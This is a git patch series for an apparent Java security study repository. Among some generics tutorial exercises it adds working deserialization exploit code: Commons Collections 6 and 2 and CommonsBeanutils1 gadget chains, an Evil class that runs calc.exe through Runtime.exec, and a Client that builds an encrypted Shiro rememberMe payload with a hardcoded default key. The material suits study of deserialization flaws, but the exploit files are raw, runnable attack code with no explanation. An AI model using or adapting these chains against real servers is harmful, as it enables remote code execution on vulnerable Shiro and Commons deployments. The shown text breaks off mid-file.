From 7667aa5ddb928e099f8978bb932e50a02ca5876d Mon Sep 17 00:00:00 2001
From: MrPointSun <szy12001995@gmail.com>
Date: Wed, 20 Sep 2023 10:43:41 +0800
Subject: [PATCH 1/3] 20230919

---
 general/general.iml                         | 20 ++++++++++++++++++++
 shiroattack/shiroattack.iml                 | 18 +++++++++++++++++-
 shirodemo/shirodemo.iml                     |  9 ++++++++-
 shirodemo/src/main/webapp/HelloServlet.java | 15 +++++++++++++++
 4 files changed, 60 insertions(+), 2 deletions(-)
 create mode 100644 general/general.iml
 create mode 100644 shirodemo/src/main/webapp/HelloServlet.java

diff --git a/general/general.iml b/general/general.iml
new file mode 100644
index 0000000..66be5e4
--- /dev/null
+++ b/general/general.iml
@@ -0,0 +1,20 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module org.jetbrains.idea.maven.project.MavenProjectsManager.isMavenModule="true" type="JAVA_MODULE" version="4">
+  <component name="NewModuleRootManager" LANGUAGE_LEVEL="JDK_1_8">
+    <output url="file://$MODULE_DIR$/target/classes" />
+    <output-test url="file://$MODULE_DIR$/target/test-classes" />
+    <content url="file://$MODULE_DIR$">
+      <sourceFolder url="file://$MODULE_DIR$/src/main/java" isTestSource="false" />
+      <excludeFolder url="file://$MODULE_DIR$/target" />
+    </content>
+    <orderEntry type="inheritedJdk" />
+    <orderEntry type="sourceFolder" forTests="false" />
+    <orderEntry type="library" name="Maven: commons-collections:commons-collections:3.2.1" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.commons:commons-collections4:4.0" level="project" />
+    <orderEntry type="library" name="Maven: commons-beanutils:commons-beanutils:1.9.4" level="project" />
+    <orderEntry type="library" name="Maven: commons-logging:commons-logging:1.2" level="project" />
+    <orderEntry type="library" name="Maven: javassist:javassist:3.12.1.GA" level="project" />
+    <orderEntry type="library" name="Maven: commons-codec:commons-codec:1.15" level="project" />
+    <orderEntry type="library" name="Maven: commons-io:commons-io:2.10.0" level="project" />
+  </component>
+</module>
\ No newline at end of file
diff --git a/shiroattack/shiroattack.iml b/shiroattack/shiroattack.iml
index 78b2cc5..b16e9c6 100644
--- a/shiroattack/shiroattack.iml
+++ b/shiroattack/shiroattack.iml
@@ -1,2 +1,18 @@
 <?xml version="1.0" encoding="UTF-8"?>
-<module type="JAVA_MODULE" version="4" />
\ No newline at end of file
+<module org.jetbrains.idea.maven.project.MavenProjectsManager.isMavenModule="true" type="JAVA_MODULE" version="4">
+  <component name="NewModuleRootManager" LANGUAGE_LEVEL="JDK_1_8">
+    <output url="file://$MODULE_DIR$/target/classes" />
+    <output-test url="file://$MODULE_DIR$/target/test-classes" />
+    <content url="file://$MODULE_DIR$">
+      <sourceFolder url="file://$MODULE_DIR$/src/main/java" isTestSource="false" />
+      <excludeFolder url="file://$MODULE_DIR$/target" />
+    </content>
+    <orderEntry type="inheritedJdk" />
+    <orderEntry type="sourceFolder" forTests="false" />
+    <orderEntry type="library" name="Maven: org.apache.shiro:shiro-core:1.2.4" level="project" />
+    <orderEntry type="library" name="Maven: org.slf4j:slf4j-api:1.6.4" level="project" />
+    <orderEntry type="library" name="Maven: commons-beanutils:commons-beanutils:1.8.3" level="project" />
+    <orderEntry type="library" name="Maven: org.javassist:javassist:3.27.0-GA" level="project" />
+    <orderEntry type="library" name="Maven: commons-collections:commons-collections:3.2.1" level="project" />
+  </component>
+</module>
\ No newline at end of file
diff --git a/shirodemo/shirodemo.iml b/shirodemo/shirodemo.iml
index 78b2cc5..17932bb 100644
--- a/shirodemo/shirodemo.iml
+++ b/shirodemo/shirodemo.iml
@@ -1,2 +1,9 @@
 <?xml version="1.0" encoding="UTF-8"?>
-<module type="JAVA_MODULE" version="4" />
\ No newline at end of file
+<module org.jetbrains.idea.maven.project.MavenProjectsManager.isMavenModule="true" type="JAVA_MODULE" version="4">
+  <component name="NewModuleRootManager">
+    <content url="file://$MODULE_DIR$">
+      <sourceFolder url="file://$MODULE_DIR$/src" isTestSource="false" />
+      <excludeFolder url="file://$MODULE_DIR$/target" />
+    </content>
+  </component>
+</module>
\ No newline at end of file
diff --git a/shirodemo/src/main/webapp/HelloServlet.java b/shirodemo/src/main/webapp/HelloServlet.java
new file mode 100644
index 0000000..60efc56
--- /dev/null
+++ b/shirodemo/src/main/webapp/HelloServlet.java
@@ -0,0 +1,15 @@
+package main.webapp;
+
+import javax.servlet.annotation.WebServlet;
+import javax.servlet.http.HttpServlet;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.IOException;
+
+@WebServlet("hello")
+public class HelloServlet extends HttpServlet {
+    @Override
+    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
+        resp.getWriter().write("hello,world!");
+    }
+}

From 62b3f9337ddfa08e759f6cf33ae4d0658a162af6 Mon Sep 17 00:00:00 2001
From: MrPointSun <szy12001995@gmail.com>
Date: Tue, 26 Sep 2023 16:26:38 +0800
Subject: [PATCH 2/3] 20230926

---
 commonscollection4/pom.xml                    | 36 +++++++++++
 .../java/org/example/CommonsCollections6.java | 60 +++++++++++++++++++
 .../java/org/example/GenericMethodTest.java   | 32 ++++++++++
 .../src/main/java/org/example/Main.java       |  7 +++
 .../main/java/org/example/MaximumTest.java    | 28 +++++++++
 5 files changed, 163 insertions(+)
 create mode 100644 commonscollection4/pom.xml
 create mode 100644 commonscollection4/src/main/java/org/example/CommonsCollections6.java
 create mode 100644 commonscollection4/src/main/java/org/example/GenericMethodTest.java
 create mode 100644 commonscollection4/src/main/java/org/example/Main.java
 create mode 100644 commonscollection4/src/main/java/org/example/MaximumTest.java

diff --git a/commonscollection4/pom.xml b/commonscollection4/pom.xml
new file mode 100644
index 0000000..079c6c5
--- /dev/null
+++ b/commonscollection4/pom.xml
@@ -0,0 +1,36 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+
+    <groupId>org.example</groupId>
+    <artifactId>commonscollection4</artifactId>
+    <version>1.0-SNAPSHOT</version>
+
+    <properties>
+        <maven.compiler.source>8</maven.compiler.source>
+        <maven.compiler.target>8</maven.compiler.target>
+        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+    </properties>
+
+    <dependencies>
+        <dependency>
+            <groupId>commons-collections</groupId>
+            <artifactId>commons-collections</artifactId>
+            <version>3.2.1</version>
+        </dependency>
+        <dependency>
+            <groupId>org.apache.commons</groupId>
+            <artifactId>commons-collections4</artifactId>
+            <version>4.0</version>
+        </dependency>
+        <dependency>
+            <groupId>org.jetbrains</groupId>
+            <artifactId>annotations</artifactId>
+            <version>RELEASE</version>
+            <scope>compile</scope>
+        </dependency>
+    </dependencies>
+
+</project>
\ No newline at end of file
diff --git a/commonscollection4/src/main/java/org/example/CommonsCollections6.java b/commonscollection4/src/main/java/org/example/CommonsCollections6.java
new file mode 100644
index 0000000..3c6425a
--- /dev/null
+++ b/commonscollection4/src/main/java/org/example/CommonsCollections6.java
@@ -0,0 +1,60 @@
+package org.example;
+
+import org.apache.commons.collections4.Transformer;
+import org.apache.commons.collections4.functors.ChainedTransformer;
+import org.apache.commons.collections4.functors.ConstantTransformer;
+import org.apache.commons.collections4.functors.InvokerTransformer;
+import org.apache.commons.collections4.keyvalue.TiedMapEntry;
+import org.apache.commons.collections4.map.LazyMap;
+
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import java.lang.reflect.Field;
+import java.util.HashMap;
+import java.util.Map;
+
+public class CommonsCollections6 {
+    public static void main(String[] args) throws Exception {
+        Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
+        Transformer[] transformers = new Transformer[] {
+                new ConstantTransformer(Runtime.class),
+                new InvokerTransformer("getMethod", new Class[] { String.class,
+                        Class[].class }, new Object[] { "getRuntime",
+                        new Class[0] }),
+                new InvokerTransformer("invoke", new Class[] { Object.class,
+                        Object[].class }, new Object[] { null, new Object[0] }),
+                new InvokerTransformer("exec", new Class[] { String.class },
+                        new String[] { "calc.exe" }),
+                new ConstantTransformer(1),
+        };
+        Transformer transformerChain = new ChainedTransformer(fakeTransformers);
+
+        // 不再使用原CommonsCollections6中的HashSet，直接使用HashMap
+        Map innerMap = new HashMap();
+        Map outerMap = LazyMap.lazyMap(innerMap, transformerChain);
+
+        TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");
+
+        Map expMap = new HashMap();
+        expMap.put(tme, "valuevalue");
+
+        outerMap.remove("keykey");
+
+        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
+        f.setAccessible(true);
+        f.set(transformerChain, transformers);
+
+        //生成序列化流
+        ByteArrayOutputStream barr = new ByteArrayOutputStream();
+        ObjectOutputStream oos = new ObjectOutputStream(barr);
+        oos.writeObject(expMap);
+        oos.close();
+
+        //输出反序列化流
+        System.out.println(barr);
+        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
+        Object o = (Object)ois.readObject();
+    }
+}
diff --git a/commonscollection4/src/main/java/org/example/GenericMethodTest.java b/commonscollection4/src/main/java/org/example/GenericMethodTest.java
new file mode 100644
index 0000000..cce7162
--- /dev/null
+++ b/commonscollection4/src/main/java/org/example/GenericMethodTest.java
@@ -0,0 +1,32 @@
+package org.example;
+
+import org.jetbrains.annotations.NotNull;
+
+public class GenericMethodTest {
+    // 泛型方法 printArray
+    public static < E > void printArray( E @NotNull [] inputArray )
+    {
+        // 输出数组元素
+        for ( E element : inputArray ){
+            System.out.printf( "%s ", element );
+        }
+        System.out.println();
+    }
+
+    public static void main(String[] args)
+    {
+        // 创建不同类型数组： Integer, Double 和 Character
+        Integer[] intArray = { 1, 2, 3, 4, 5 };
+        Double[] doubleArray = { 1.1, 2.2, 3.3, 4.4 };
+        Character[] charArray = { 'H', 'E', 'L', 'L', 'O' };
+
+        System.out.println( "整型数组元素为:" );
+        printArray( intArray  ); // 传递一个整型数组
+
+        System.out.println( "\n双精度型数组元素为:" );
+        printArray( doubleArray ); // 传递一个双精度型数组
+
+        System.out.println( "\n字符型数组元素为:" );
+        printArray( charArray ); // 传递一个字符型数组
+    }
+}
diff --git a/commonscollection4/src/main/java/org/example/Main.java b/commonscollection4/src/main/java/org/example/Main.java
new file mode 100644
index 0000000..407f157
--- /dev/null
+++ b/commonscollection4/src/main/java/org/example/Main.java
@@ -0,0 +1,7 @@
+package org.example;
+
+public class Main {
+    public static void main(String[] args) {
+        System.out.println("Hello world!");
+    }
+}
\ No newline at end of file
diff --git a/commonscollection4/src/main/java/org/example/MaximumTest.java b/commonscollection4/src/main/java/org/example/MaximumTest.java
new file mode 100644
index 0000000..90dbb68
--- /dev/null
+++ b/commonscollection4/src/main/java/org/example/MaximumTest.java
@@ -0,0 +1,28 @@
+package org.example;
+
+public class MaximumTest
+{
+    // 比较三个值并返回最大值
+    public static <T extends Comparable<T>> T maximum(T x, T y, T z)
+    {
+        T max = x; // 假设x是初始最大值
+        if ( y.compareTo( max ) > 0 ){
+            max = y; //y 更大
+        }
+        if ( z.compareTo( max ) > 0 ){
+            max = z; // 现在 z 更大
+        }
+        return max; // 返回最大对象
+    }
+    public static void main( String args[] )
+    {
+        System.out.printf( "%d, %d 和 %d 中最大的数为 %d\n\n",
+                3, 4, 5, maximum( 3, 4, 5 ) );
+
+        System.out.printf( "%.1f, %.1f 和 %.1f 中最大的数为 %.1f\n\n",
+                6.6, 8.8, 7.7, maximum( 6.6, 8.8, 7.7 ) );
+
+        System.out.printf( "%s, %s 和 %s 中最大的数为 %s\n","pear",
+                "apple", "orange", maximum( "pear", "apple", "orange" ) );
+    }
+}
\ No newline at end of file

From 895fdf0d516be7ee88b124a9e7032e22259f43a5 Mon Sep 17 00:00:00 2001
From: MrPointSun <szy12001995@gmail.com>
Date: Thu, 12 Oct 2023 19:01:26 +0800
Subject: [PATCH 3/3] 20231012

---
 commonscollection4/pom.xml                    | 58 ++++++++++++++++--
 .../src/main/java/org/example/Box.java        | 25 ++++++++
 .../src/main/java/org/example/Client.java     | 26 ++++++++
 .../java/org/example/CommonsBeanutils1.java   | 56 +++++++++++++++++
 .../org/example/CommonsBeanutils1Shiro.java   | 44 +++++++++++++
 .../java/org/example/CommonsCollections2.java | 57 +++++++++++++++++
 .../CommonsCollections2TemplatesImpl.java     | 61 +++++++++++++++++++
 .../src/main/java/org/example/Evil.java       | 19 ++++++
 .../main/java/org/example/GenericTest.java    | 25 ++++++++
 .../main/java/org/example/GenericTest2.java   | 31 ++++++++++
 .../main/java/org/example/KeyValuePair.java   | 46 ++++++++++++++
 .../java/org/example/KeyValuePairExample.java | 27 ++++++++
 .../main/java/org/example/MaximumTest.java    |  4 +-
 .../src/main/java/org/example/Person.java     | 44 +++++++++++++
 .../src/main/java/org/example/Printer.java    | 14 +++++
 shiroattack/shiroattack.iml                   | 18 ------
 shirodemo/pom.xml                             | 10 +--
 shirodemo/shirodemo.iml                       |  9 ---
 18 files changed, 536 insertions(+), 38 deletions(-)
 create mode 100644 commonscollection4/src/main/java/org/example/Box.java
 create mode 100644 commonscollection4/src/main/java/org/example/Client.java
 create mode 100644 commonscollection4/src/main/java/org/example/CommonsBeanutils1.java
 create mode 100644 commonscollection4/src/main/java/org/example/CommonsBeanutils1Shiro.java
 create mode 100644 commonscollection4/src/main/java/org/example/CommonsCollections2.java
 create mode 100644 commonscollection4/src/main/java/org/example/CommonsCollections2TemplatesImpl.java
 create mode 100644 commonscollection4/src/main/java/org/example/Evil.java
 create mode 100644 commonscollection4/src/main/java/org/example/GenericTest.java
 create mode 100644 commonscollection4/src/main/java/org/example/GenericTest2.java
 create mode 100644 commonscollection4/src/main/java/org/example/KeyValuePair.java
 create mode 100644 commonscollection4/src/main/java/org/example/KeyValuePairExample.java
 create mode 100644 commonscollection4/src/main/java/org/example/Person.java
 create mode 100644 commonscollection4/src/main/java/org/example/Printer.java
 delete mode 100644 shiroattack/shiroattack.iml
 delete mode 100644 shirodemo/shirodemo.iml

diff --git a/commonscollection4/pom.xml b/commonscollection4/pom.xml
index 079c6c5..d6622a5 100644
--- a/commonscollection4/pom.xml
+++ b/commonscollection4/pom.xml
@@ -15,11 +15,11 @@
     </properties>
 
     <dependencies>
-        <dependency>
-            <groupId>commons-collections</groupId>
-            <artifactId>commons-collections</artifactId>
-            <version>3.2.1</version>
-        </dependency>
+<!--        <dependency>-->
+<!--            <groupId>commons-collections</groupId>-->
+<!--            <artifactId>commons-collections</artifactId>-->
+<!--            <version>3.2.1</version>-->
+<!--        </dependency>-->
         <dependency>
             <groupId>org.apache.commons</groupId>
             <artifactId>commons-collections4</artifactId>
@@ -31,6 +31,54 @@
             <version>RELEASE</version>
             <scope>compile</scope>
         </dependency>
+        <dependency>
+            <groupId>org.javassist</groupId>
+            <artifactId>javassist</artifactId>
+            <version>3.27.0-GA</version>
+        </dependency>
+<!--        <dependency>-->
+<!--            <groupId>commons-beanutils</groupId>-->
+<!--            <artifactId>commons-beanutils</artifactId>-->
+<!--            <version>1.9.2</version>-->
+<!--        </dependency>-->
+
+        <dependency>
+            <groupId>org.apache.shiro</groupId>
+            <artifactId>shiro-core</artifactId>
+            <version>1.2.4</version>
+        </dependency>
+        <dependency>
+            <groupId>org.apache.shiro</groupId>
+            <artifactId>shiro-web</artifactId>
+            <version>1.2.4</version>
+        </dependency>
+        <dependency>
+            <groupId>javax.servlet</groupId>
+            <artifactId>javax.servlet-api</artifactId>
+            <version>3.1.0</version>
+            <scope>provided</scope>
+        </dependency>
+        <dependency>
+            <groupId>javax.servlet.jsp</groupId>
+            <artifactId>jsp-api</artifactId>
+            <version>2.2</version>
+            <scope>provided</scope>
+        </dependency>
+        <dependency>
+            <groupId>org.slf4j</groupId>
+            <artifactId>slf4j-api</artifactId>
+            <version>1.7.30</version>
+        </dependency>
+        <dependency>
+            <groupId>org.slf4j</groupId>
+            <artifactId>slf4j-simple</artifactId>
+            <version>1.7.30</version>
+        </dependency>
+        <dependency>
+            <groupId>commons-logging</groupId>
+            <artifactId>commons-logging</artifactId>
+            <version>1.2</version>
+        </dependency>
     </dependencies>
 
 </project>
\ No newline at end of file
diff --git a/commonscollection4/src/main/java/org/example/Box.java b/commonscollection4/src/main/java/org/example/Box.java
new file mode 100644
index 0000000..2c10190
--- /dev/null
+++ b/commonscollection4/src/main/java/org/example/Box.java
@@ -0,0 +1,25 @@
+package org.example;
+
+public class Box<T> {
+
+    private T t;
+
+    public void add(T t) {
+        this.t = t;
+    }
+
+    public T get() {
+        return t;
+    }
+
+    public static void main(String[] args) {
+        Box<Integer> integerBox = new Box<>();
+        Box<String> stringBox = new Box<>();
+
+        integerBox.add(new Integer(10));
+        stringBox.add(new String("菜鸟教程"));
+
+        System.out.printf("整型值为 :%d\n\n", integerBox.get());
+        System.out.printf("字符串为 :%s\n", stringBox.get());
+    }
+}
diff --git a/commonscollection4/src/main/java/org/example/Client.java b/commonscollection4/src/main/java/org/example/Client.java
new file mode 100644
index 0000000..9b39095
--- /dev/null
+++ b/commonscollection4/src/main/java/org/example/Client.java
@@ -0,0 +1,26 @@
+package org.example;
+
+import javassist.CannotCompileException;
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.NotFoundException;
+import org.apache.shiro.crypto.AesCipherService;
+import org.apache.shiro.util.ByteSource;
+
+import java.io.IOException;
+import java.util.Base64;
+
+public class Client {
+    public static void main(String[] args) throws Exception {
+        ClassPool pool = ClassPool.getDefault();
+        CtClass clazz = pool.get(org.example.Evil.class.getName());
+        byte[] payload = new CommonsBeanutils1Shiro().getPayload(clazz.toBytecode());
+
+        AesCipherService aes = new AesCipherService();
+        byte[] decode = Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");
+
+        ByteSource encrypt = aes.encrypt(payload, decode);
+        System.out.println(encrypt);
+    }
+
+}
diff --git a/commonscollection4/src/main/java/org/example/CommonsBeanutils1.java b/commonscollection4/src/main/java/org/example/CommonsBeanutils1.java
new file mode 100644
index 0000000..c9eb236
--- /dev/null
+++ b/commonscollection4/src/main/java/org/example/CommonsBeanutils1.java
@@ -0,0 +1,56 @@
+package org.example;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import javassist.ClassPool;
+import javassist.CtClass;
+import org.apache.commons.beanutils.BeanComparator;
+
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import java.lang.reflect.Field;
+import java.util.PriorityQueue;
+
+public class CommonsBeanutils1 {
+    private static void setFieldValue(Object obj, String fieldName, Object value) throws NoSuchFieldException, IllegalAccessException {
+        Field f = obj.getClass().getDeclaredField(fieldName);
+        f.setAccessible(true);
+        f.set(obj, value);
+    }
+
+    protected static byte[] getBytescode() throws Exception {
+        ClassPool pool = ClassPool.getDefault();
+        CtClass clazz = pool.get(org.example.Evil.class.getName());
+        return clazz.toBytecode();
+    }
+    public static void main(String[] args) throws Exception {
+        TemplatesImpl obj = new TemplatesImpl();
+        setFieldValue(obj, "_bytecodes", new byte[][]{getBytescode()});
+        setFieldValue(obj, "_name", "HelloTemplatesImpl");
+        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
+
+        BeanComparator comparator = new BeanComparator();
+
+        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
+        queue.add(1);
+        queue.add(1);
+
+        setFieldValue(comparator, "property", "outputProperties");
+        setFieldValue(queue, "queue", new Object[]{obj, obj});
+
+        //生成序列化流
+        ByteArrayOutputStream barr = new ByteArrayOutputStream();
+        ObjectOutputStream oos = new ObjectOutputStream(barr);
+        oos.writeObject(queue);
+        oos.close();
+
+        //输出反序列化流
+        System.out.println(barr);
+        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
+        Object o = (Object)ois.readObject();
+
+
+    }
+}
diff --git a/commonscollection4/src/main/java/org/example/CommonsBeanutils1Shiro.java b/commonscollection4/src/main/java/org/example/CommonsBeanutils1Shiro.java
new file mode 100644
index 0000000..2cd0434
--- /dev/null
+++ b/commonscollection4/src/main/java/org/example/CommonsBeanutils1Shiro.java
@@ -0,0 +1,44 @@
+package org.example;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import javassist.ClassPool;
+import javassist.CtClass;
+import org.apache.commons.beanutils.BeanComparator;
+
+
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectOutputStream;
+import java.lang.reflect.Field;
+import java.util.PriorityQueue;
+
+public class CommonsBeanutils1Shiro {
+    private static void setFieldValue(Object obj, String fieldName, Object value) throws NoSuchFieldException, IllegalAccessException {
+        Field f = obj.getClass().getDeclaredField(fieldName);
+        f.setAccessible(true);
+        f.set(obj, value);
+    }
+
+    public static byte[] getPayload(byte[] clazzBytes) throws Exception {
+        TemplatesImpl obj = new TemplatesImpl();
+        setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes});
+        setFieldValue(obj, "_name", "HelloTemplatesImpl");
+        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
+
+        final BeanComparator comparator = new BeanComparator(null,  String.CASE_INSENSITIVE_ORDER);
+
+        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
+        queue.add("1");
+        queue.add("1");
+
+        setFieldValue(comparator, "property", "outputProperties");
+        setFieldValue(queue, "queue", new Object[]{obj, obj});
+
+        //生成序列化流
+        ByteArrayOutputStream barr = new ByteArrayOutputStream();
+        ObjectOutputStream oos = new ObjectOutputStream(barr);
+        oos.writeObject(queue);
+        oos.close();
+        return barr.toByteArray();
+    }
+}
diff --git a/commonscollection4/src/main/java/org/example/CommonsCollections2.java b/commonscollection4/src/main/java/org/example/CommonsCollections2.java
new file mode 100644
index 0000000..2755dc4
--- /dev/null
+++ b/commonscollection4/src/main/java/org/example/CommonsCollections2.java
@@ -0,0 +1,57 @@
+package org.example;
+
+import org.apache.commons.collections4.Transformer;
+import org.apache.commons.collections4.comparators.TransformingComparator;
+import org.apache.commons.collections4.functors.ChainedTransformer;
+import org.apache.commons.collections4.functors.ConstantTransformer;
+import org.apache.commons.collections4.functors.InvokerTransformer;
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import java.lang.reflect.Field;
+import java.util.Comparator;
+import java.util.PriorityQueue;
+
+
+public class CommonsCollections2 {
+    public static void main(String[] args) throws Exception {
+        Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
+        Transformer[] transformers = new Transformer[] {
+                new ConstantTransformer(Runtime.class),
+                new InvokerTransformer("getMethod", new Class[] { String.class,
+                        Class[].class }, new Object[] { "getRuntime",
+                        new Class[0] }),
+                new InvokerTransformer("invoke", new Class[] { Object.class,
+                        Object[].class }, new Object[] { null, new Object[0] }),
+                new InvokerTransformer("exec", new Class[] { String.class },
+                        new String[] { "calc.exe" }),
+                new ConstantTransformer(1),
+        };
+        Transformer transformerChain = new ChainedTransformer(fakeTransformers);
+        Comparator comparator = new TransformingComparator(transformerChain);
+
+        PriorityQueue queue = new PriorityQueue(2, comparator);
+        queue.add(1);
+        queue.add(2);
+
+        setFieldValue(transformerChain, "iTransformers", transformers);
+
+        //生成序列化流
+        ByteArrayOutputStream barr = new ByteArrayOutputStream();
+        ObjectOutputStream oos = new ObjectOutputStream(barr);
+        oos.writeObject(queue);
+        oos.close();
+
+        //输出反序列化流
+        System.out.println(barr);
+        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
+        Object o = (Object)ois.readObject();
+    }
+
+    private static void setFieldValue(Object obj, String fieldName, Object value) throws NoSuchFieldException, IllegalAccessException {
+        Field f = obj.getClass().getDeclaredField(fieldName);
+        f.setAccessible(true);
+        f.set(obj, value);
+    }
+}
diff --git a/commonscollection4/src/main/java/org/example/CommonsCollections2TemplatesImpl.java b/commonscollection4/src/main/java/org/example/CommonsCollections2TemplatesImpl.java
new file mode 100644
index 0000000..412060d
--- /dev/null
+++ b/commonscollection4/src/main/java/org/example/CommonsCollections2TemplatesImpl.java
@@ -0,0 +1,61 @@
+package org.example;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import javassist.ClassPool;
+import javassist.CtClass;
+import org.apache.commons.collections4.Transformer;
+import org.apache.commons.collections4.comparators.TransformingComparator;
+import org.apache.commons.collections4.functors.ChainedTransformer;
+import org.apache.commons.collections4.functors.ConstantTransformer;
+import org.apache.commons.collections4.functors.InvokerTransformer;
+
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import java.lang.reflect.Field;
+import java.util.Comparator;
+import java.util.PriorityQueue;
+
+public class CommonsCollections2TemplatesImpl {
+    public static void main(String[] args) throws Exception {
+        TemplatesImpl obj = new TemplatesImpl();
+        setFieldValue(obj, "_bytecodes", new byte[][]{getBytescode()});
+        setFieldValue(obj, "_name", "HelloTemplatesImpl");
+        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
+
+        Transformer transformer = new InvokerTransformer("toString", null, null);
+
+        Comparator comparator = new TransformingComparator(transformer);
+
+        PriorityQueue queue = new PriorityQueue(2, comparator);
+        queue.add(obj);
+        queue.add(obj);
+
+        setFieldValue(transformer, "iMethodName", "newTransformer");
+
+        //生成序列化流
+        ByteArrayOutputStream barr = new ByteArrayOutputStream();
+        ObjectOutputStream oos = new ObjectOutputStream(barr);
+        oos.writeObject(queue);
+        oos.close();
+
+        //输出反序列化流
+        System.out.println(barr);
+        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
+        Object o = (Object)ois.readObject();
+    }
+
+    private static void setFieldValue(Object obj, String fieldName, Object value) throws NoSuchFieldException, IllegalAccessException {
+        Field f = obj.getClass().getDeclaredField(fieldName);
+        f.setAccessible(true);
+        f.set(obj, value);
+    }
+
+    protected static byte[] getBytescode() throws Exception {
+        ClassPool pool = ClassPool.getDefault();
+        CtClass clazz = pool.get(org.example.Evil.class.getName());
+        return clazz.toBytecode();
+    }
+}
diff --git a/commonscollection4/src/main/java/org/example/Evil.java b/commonscollection4/src/main/java/org/example/Evil.java
new file mode 100644
index 0000000..7164aea
--- /dev/null
+++ b/commonscollection4/src/main/java/org/example/Evil.java
@@ -0,0 +1,19 @@
+package org.example;
+
+import com.sun.org.apache.xalan.internal.xsltc.DOM;
+import com.sun.org.apache.xalan.internal.xsltc.TransletException;
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
+import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
+
+public class Evil extends AbstractTranslet {
+    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}
+
+    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}
+
+    public Evil() throws Exception {
+        super();
+        System.out.println("Hello TemplatesImpl");
+        Runtime.getRuntime().exec("calc.exe");
+    }
+}
\ No newline at end of file
diff --git a/commonscollection4/src/main/java/org/example/GenericTest.java b/commonscollection4/src/main/java/org/example/GenericTest.java
new file mode 100644
index 0000000..40aef38
--- /dev/null
+++ b/commonscollection4/src/main/java/org/example/GenericTest.java
@@ -0,0 +1,25 @@
+package org.example;
+
+import java.util.*;
+
+public class GenericTest {
+
+    public static void main(String[] args) {
+        List<String> name = new ArrayList<>();
+        List<Integer> age = new ArrayList<>();
+        List<Number> number = new ArrayList<>();
+
+        name.add("icon");
+        age.add(18);
+        number.add(314);
+
+        getData(name);
+        getData(age);
+        getData(number);
+
+    }
+
+    public static void getData(List<?> data) {
+        System.out.println("data :" + data.get(0));
+    }
+}
diff --git a/commonscollection4/src/main/java/org/example/GenericTest2.java b/commonscollection4/src/main/java/org/example/GenericTest2.java
new file mode 100644
index 0000000..56662a4
--- /dev/null
+++ b/commonscollection4/src/main/java/org/example/GenericTest2.java
@@ -0,0 +1,31 @@
+package org.example;
+
+import org.jetbrains.annotations.NotNull;
+
+import java.util.*;
+
+public class GenericTest2 {
+
+    public static void main(String[] args) {
+        List<String> name = new ArrayList<>();
+        List<Integer> age = new ArrayList<>();
+        List<Number> number = new ArrayList<>();
+
+        name.add("icon");
+        age.add(18);
+        number.add(314);
+
+//        getUperNumber(name);//1
+        getUperNumber(age);//2
+        getUperNumber(number);//3
+
+    }
+
+    public static void getData(@NotNull List<?> data) {
+        System.out.println("data :" + data.get(0));
+    }
+
+    public static void getUperNumber(@NotNull List<? extends Number> data) {
+        System.out.println("data :" + data.get(0));
+    }
+}
diff --git a/commonscollection4/src/main/java/org/example/KeyValuePair.java b/commonscollection4/src/main/java/org/example/KeyValuePair.java
new file mode 100644
index 0000000..e32b797
--- /dev/null
+++ b/commonscollection4/src/main/java/org/example/KeyValuePair.java
@@ -0,0 +1,46 @@
+package org.example;
+
+public class KeyValuePair<K, V> {
+    private K key;
+    private V value;
+
+    public KeyValuePair(K key, V value) {
+        this.key = key;
+        this.value = value;
+    }
+
+    public KeyValuePair() {
+        System.out.println("this is KeyValuePair");
+    }
+
+    public K getKey() {
+        return key;
+    }
+
+    public V getValue() {
+        return value;
+    }
+
+    public void setKey(K key) {
